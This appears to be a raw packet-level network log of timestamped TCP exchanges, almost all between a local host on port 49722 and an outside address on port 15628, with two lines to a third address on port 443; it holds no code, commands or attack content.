Jul 20, 2024 16:31:42.556019068 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.561633110 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.568922997 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.569250107 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.576841116 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.577379942 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.582503080 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.582906961 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.588296890 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.588553905 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.593519926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.593604088 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.598629951 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.598829985 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.603854895 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.603971004 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.605556011 CEST	49748	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:31:42.605580091 CEST	443	49748	183.60.146.66	192.168.2.6
Jul 20, 2024 16:31:42.609153032 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.609322071 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.614528894 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.614677906 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.619589090 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.619705915 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.625121117 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.625571012 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.630552053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.630887032 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.635719061 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.635970116 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.640866995 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.641320944 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.646410942 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.646930933 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.651915073 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.652478933 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.657640934 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.657758951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.663435936 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.663599014 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.669291019 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.669713020 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.674742937 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.674937010 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.680397987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.680543900 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.686256886 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.686510086 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.691536903 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.691621065 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.698061943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.698498964 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.703560114 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.703958988 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.708822966 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.709229946 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.714230061 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.714472055 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.719544888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.719661951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.728621006 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.728753090 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.735296965 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.736968040 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.742109060 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.742257118 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.747117996 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.747323990 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.752258062 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.752552032 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.757546902 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.757972956 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.765997887 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.766287088 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.771608114 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.771712065 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.776959896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.777225971 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.782138109 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.782557011 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.789161921 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.789390087 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.794832945 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.794962883 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.800009012 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.800117970 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.806164026 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.806634903 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.811598063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.811779022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.817162037 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.817774057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.822777033 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.823041916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.828129053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.828466892 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.833811045 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.837939024 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.842963934 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.843786001 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.849436998 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.849735022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.854681015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.857628107 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.862504959 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.862600088 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.871789932 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.877964973 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.883316994 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.883785963 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.888936043 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.889544964 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.894603014 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.894890070 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.899852037 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.901509047 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.906575918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.906826019 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.912311077 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.912997007 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.918174982 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.921715975 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.930066109 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.933820963 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.939007998 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.939779997 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.944868088 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.945691109 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.950674057 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.951947927 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.957793951 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.960663080 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.965790987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.969042063 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.983706951 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.989813089 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:42.994860888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:42.996087074 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.001050949 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.001780987 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.006735086 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.007894039 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.015024900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.016834974 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.021872997 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.025824070 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.030802011 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.031832933 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.037098885 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.037301064 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.042193890 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.044013023 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.049103022 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.049266100 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.054152012 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.056184053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.063358068 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.065845013 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.071566105 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.072762966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.077677965 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.080346107 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.089206934 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.089740038 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.095772982 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.100327969 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.105583906 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.108927011 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.114067078 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.115947962 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.127033949 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.127818108 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.150506020 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.160514116 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.169059038 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.169794083 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.175350904 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.177835941 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.182996988 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.184698105 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.189656019 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.189815998 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.194820881 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.197839975 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.202953100 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.203443050 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.208322048 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.214495897 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.223337889 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.223684072 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.228667974 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.232445955 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.239135981 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.240509033 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.245583057 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.250144958 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.255214930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.258162975 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.268956900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.269855022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.276292086 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.277072906 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.282635927 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.282900095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.288075924 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.288461924 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.293816090 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.295270920 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.300407887 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.300671101 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.306174040 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.306945086 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.311943054 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.312335968 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.317424059 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.318682909 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.324070930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.324774027 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.329853058 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.330534935 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.339195013 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.339315891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.344480038 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.344652891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.349663973 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.349880934 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.354888916 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.354991913 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.360759974 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.360863924 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.365942001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.366029978 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.372354984 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.377572060 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.382848024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.383028984 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.388778925 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.389482975 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.395198107 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.395265102 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.403295040 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.403496981 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.408817053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.408950090 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.413985014 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.414113998 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.419056892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.420547962 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.434449911 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.434585094 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.444602013 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.444731951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.449817896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.450001955 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.454916000 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.457556963 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.462621927 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.466799021 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.471893072 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.475877047 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.480846882 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.480995893 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.486020088 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.486191988 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.491162062 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.491522074 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.496841908 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.496979952 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.501928091 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.502062082 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.507205963 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.507570028 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.513082027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.513139009 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.518279076 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.518337011 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.525038004 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.525270939 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.530652046 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.530713081 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.536160946 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.536257029 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.541419983 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.541495085 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.547122955 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.548073053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.553155899 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.553226948 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.562567949 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.562623978 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.569621086 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.569675922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.575387955 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.575445890 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.580960989 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.581020117 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.589615107 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.589917898 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.594863892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.596556902 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.603533030 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.605520010 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.610785007 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.611519098 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.616626024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.616729021 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.621723890 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.621798992 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.627058983 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.627166986 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.632369041 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.632428885 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.637336969 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.637412071 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.648032904 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.648113966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.660516024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.660651922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.667891979 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.667985916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.674052000 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.674127102 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.679331064 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.679403067 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:43.684499025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:43.684555054 CEST	49722	15628	192.168.2.6	154.204.0.5
